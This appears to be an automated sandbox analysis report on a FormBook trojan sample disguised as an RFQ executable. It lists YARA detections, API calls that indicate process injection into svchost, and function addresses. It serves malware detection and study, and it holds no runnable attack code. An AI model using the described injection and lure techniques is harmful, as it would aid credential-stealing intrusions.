              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00EFCDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00EFCDAC

              E-Banking Fraud

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 1.2.svchost.exe.2500000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 13.2.xl9lsbb.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 13.2.xl9lsbb.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.svchost.exe.2500000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000002.1749592251.0000000002500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.4104203005.0000000006D70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.4101074559.0000000000630000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.4103858952.00000000043C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.4103945476.0000000004400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.3649278175.0000000005330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.3649137742.00000000016B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.1750132612.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.1749816358.0000000002D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4104107521.0000000003670000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.3647567861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.4103523467.0000000001500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4103630939.0000000003A30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4101142200.0000000002FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4104284280.00000000036B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.4105348256.0000000004A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 1.2.svchost.exe.2500000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 13.2.xl9lsbb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 13.2.xl9lsbb.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 1.2.svchost.exe.2500000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000001.00000002.1749592251.0000000002500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000000E.00000002.4104203005.0000000006D70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000000F.00000002.4101074559.0000000000630000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000000F.00000002.4103858952.00000000043C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000000F.00000002.4103945476.0000000004400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000000D.00000002.3649278175.0000000005330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000000D.00000002.3649137742.00000000016B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000001.00000002.1750132612.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000001.00000002.1749816358.0000000002D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000003.00000002.4104107521.0000000003670000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000000D.00000002.3647567861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000010.00000002.4103523467.0000000001500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000002.00000002.4103630939.0000000003A30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000003.00000002.4101142200.0000000002FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000003.00000002.4104284280.00000000036B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000005.00000002.4105348256.0000000004A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              .NET source code contains very large array initializations
              Source: 11.2.xl9lsbb.exe.6ef0000.4.raw.unpack, -Module-.csLarge array initialization: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E: array initializer size 3088
              Source: 11.2.xl9lsbb.exe.2aac2e8.1.raw.unpack, -Module-.csLarge array initialization: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E: array initializer size 3088
              Binary is likely a compiled AutoIt script file
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: This is a third-party compiled AutoIt script.0_2_00E73B4C
              Source: RFQ - MK FMHS.RFQ.24.101.exeString found in binary or memory: This is a third-party compiled AutoIt script.
              Source: RFQ - MK FMHS.RFQ.24.101.exe, 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_8aa8cb6b-7
              Source: RFQ - MK FMHS.RFQ.24.101.exe, 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_e24066ef-9
              Source: RFQ - MK FMHS.RFQ.24.101.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_0400af05-b
              Source: RFQ - MK FMHS.RFQ.24.101.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_8c773c53-9
              Initial sample is a PE file and has a suspicious name
              Source: initial sampleStatic PE information: Filename: RFQ - MK FMHS.RFQ.24.101.exe
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0252B003 NtClose,1_2_0252B003
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72B60 NtClose,LdrInitializeThunk,1_2_02F72B60
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_02F72DF0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F735C0 NtCreateMutant,LdrInitializeThunk,1_2_02F735C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F74340 NtSetContextThread,1_2_02F74340
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F74650 NtSuspendThread,1_2_02F74650
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72AF0 NtWriteFile,1_2_02F72AF0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72AD0 NtReadFile,1_2_02F72AD0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72AB0 NtWaitForSingleObject,1_2_02F72AB0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72BF0 NtAllocateVirtualMemory,1_2_02F72BF0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72BE0 NtQueryValueKey,1_2_02F72BE0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72BA0 NtEnumerateValueKey,1_2_02F72BA0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72B80 NtQueryInformationFile,1_2_02F72B80
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72EE0 NtQueueApcThread,1_2_02F72EE0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72EA0 NtAdjustPrivilegesToken,1_2_02F72EA0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72E80 NtReadVirtualMemory,1_2_02F72E80
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72E30 NtWriteVirtualMemory,1_2_02F72E30
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72FE0 NtCreateFile,1_2_02F72FE0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72FB0 NtResumeThread,1_2_02F72FB0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72FA0 NtQuerySection,1_2_02F72FA0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72F90 NtProtectVirtualMemory,1_2_02F72F90
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72F60 NtCreateProcessEx,1_2_02F72F60
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72F30 NtCreateSection,1_2_02F72F30
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72CF0 NtOpenProcess,1_2_02F72CF0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72CC0 NtQueryVirtualMemory,1_2_02F72CC0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72CA0 NtQueryInformationToken,1_2_02F72CA0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72C70 NtFreeVirtualMemory,1_2_02F72C70
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72C60 NtCreateKey,1_2_02F72C60
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72C00 NtQueryInformationProcess,1_2_02F72C00
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72DD0 NtDelayExecution,1_2_02F72DD0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72DB0 NtEnumerateKey,1_2_02F72DB0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72D30 NtUnmapViewOfSection,1_2_02F72D30
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72D10 NtMapViewOfSection,1_2_02F72D10
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72D00 NtSetInformationFile,1_2_02F72D00
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F73090 NtSetValueKey,1_2_02F73090
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F73010 NtOpenDirectoryObject,1_2_02F73010
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F739B0 NtGetContextThread,1_2_02F739B0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F73D70 NtOpenThread,1_2_02F73D70
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F73D10 NtOpenProcessToken,1_2_02F73D10
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A44340 NtSetContextThread,LdrInitializeThunk,3_2_03A44340
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A44650 NtSuspendThread,LdrInitializeThunk,3_2_03A44650
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A42BA0 NtEnumerateValueKey,LdrInitializeThunk,3_2_03A42BA0
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A42BE0 NtQueryValueKey,LdrInitializeThunk,3_2_03A42BE0
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A42BF0 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_03A42BF0
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A42B60 NtClose,LdrInitializeThunk,3_2_03A42B60
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A42AF0 NtWriteFile,LdrInitializeThunk,3_2_03A42AF0
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A42AD0 NtReadFile,LdrInitializeThunk,3_2_03A42AD0
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A42FB0 NtResumeThread,LdrInitializeThunk,3_2_03A42FB0
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A42FE0 NtCreateFile,LdrInitializeThunk,3_2_03A42FE0
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A42F30 NtCreateSection,LdrInitializeThunk,3_2_03A42F30
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A42E80 NtReadVirtualMemory,LdrInitializeThunk,3_2_03A42E80
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A42EE0 NtQueueApcThread,LdrInitializeThunk,3_2_03A42EE0
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A42DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_03A42DF0
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A42DD0 NtDelayExecution,LdrInitializeThunk,3_2_03A42DD0
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A42D30 NtUnmapViewOfSection,LdrInitializeThunk,3_2_03A42D30
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A42D10 NtMapViewOfSection,LdrInitializeThunk,3_2_03A42D10
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A42CA0 NtQueryInformationToken,LdrInitializeThunk,3_2_03A42CA0
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A42C60 NtCreateKey,LdrInitializeThunk,3_2_03A42C60
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A42C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_03A42C70
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A435C0 NtCreateMutant,LdrInitializeThunk,3_2_03A435C0
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A439B0 NtGetContextThread,LdrInitializeThunk,3_2_03A439B0
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A42B80 NtQueryInformationFile,3_2_03A42B80
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A42AB0 NtWaitForSingleObject,3_2_03A42AB0
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A42FA0 NtQuerySection,3_2_03A42FA0
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A42F90 NtProtectVirtualMemory,3_2_03A42F90
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A42F60 NtCreateProcessEx,3_2_03A42F60
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A42EA0 NtAdjustPrivilegesToken,3_2_03A42EA0
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A42E30 NtWriteVirtualMemory,3_2_03A42E30
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A42DB0 NtEnumerateKey,3_2_03A42DB0
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A42D00 NtSetInformationFile,3_2_03A42D00
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A42CF0 NtOpenProcess,3_2_03A42CF0
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A42CC0 NtQueryVirtualMemory,3_2_03A42CC0
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A42C00 NtQueryInformationProcess,3_2_03A42C00
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A43090 NtSetValueKey,3_2_03A43090
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A43010 NtOpenDirectoryObject,3_2_03A43010
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A43D10 NtOpenProcessToken,3_2_03A43D10
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A43D70 NtOpenThread,3_2_03A43D70
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FC7BE0 NtDeleteFile,3_2_02FC7BE0
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FC7B00 NtReadFile,3_2_02FC7B00
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FC79A0 NtCreateFile,3_2_02FC79A0
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FC7C70 NtClose,3_2_02FC7C70
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FC7DC0 NtAllocateVirtualMemory,3_2_02FC7DC0
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00ED40B1: CreateFileW,_memset,DeviceIoControl,CloseHandle,0_2_00ED40B1
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00EC8858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00EC8858
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00ED545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00ED545F
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00E7E8000_2_00E7E800
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00E9DBB50_2_00E9DBB5
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00E7E0600_2_00E7E060
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00EF804A0_2_00EF804A
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00E841400_2_00E84140
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00E924050_2_00E92405
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00EA65220_2_00EA6522
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00EF06650_2_00EF0665
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00EA267E0_2_00EA267E
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00E868430_2_00E86843
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00E9283A0_2_00E9283A
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00EA89DF0_2_00EA89DF
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00EF0AE20_2_00EF0AE2
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00EA6A940_2_00EA6A94
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00E88A0E0_2_00E88A0E
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00ECEB070_2_00ECEB07
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00ED8B130_2_00ED8B13
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00E9CD610_2_00E9CD61
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00EA70060_2_00EA7006
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00E831900_2_00E83190
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00E8710E0_2_00E8710E
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00E712870_2_00E71287
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00E933C70_2_00E933C7
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00E9F4190_2_00E9F419
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00E916C40_2_00E916C4
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00E856800_2_00E85680
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00E858C00_2_00E858C0
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00E978D30_2_00E978D3
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00E91BB80_2_00E91BB8
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00EA9D050_2_00EA9D05
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00E7FE400_2_00E7FE40
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00E9BFE60_2_00E9BFE6
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00E91FD00_2_00E91FD0
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00E535F00_2_00E535F0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0250E25E1_2_0250E25E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_025010001_2_02501000
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_025011701_2_02501170
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0250E16B1_2_0250E16B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_025031101_2_02503110
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_025021D01_2_025021D0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_025019A01_2_025019A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_025166031_2_02516603
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0250FF131_2_0250FF13
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0250DF931_2_0250DF93
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0252D4331_2_0252D433
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0250FCF31_2_0250FCF3
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0250FCEC1_2_0250FCEC
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_025024B01_2_025024B0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_025024A41_2_025024A4
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_025165FE1_2_025165FE
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC02C01_2_02FC02C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE02741_2_02FE0274
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030003E61_2_030003E6
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4E3F01_2_02F4E3F0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFA3521_2_02FFA352
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030001AA1_2_030001AA
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD20001_2_02FD2000
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF81CC1_2_02FF81CC
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF41A21_2_02FF41A2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC81581_2_02FC8158
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDA1181_2_02FDA118
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F301001_2_02F30100
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5C6E01_2_02F5C6E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3C7C01_2_02F3C7C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F407701_2_02F40770
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F647501_2_02F64750
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEE4F61_2_02FEE4F6
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030005911_2_03000591
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF24461_2_02FF2446
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE44201_2_02FE4420
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F405351_2_02F40535
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA801_2_02F3EA80
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF6BD71_2_02FF6BD7
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFAB401_2_02FFAB40
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E8F01_2_02F6E8F0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F268B81_2_02F268B8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300A9A61_2_0300A9A6
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4A8401_2_02F4A840
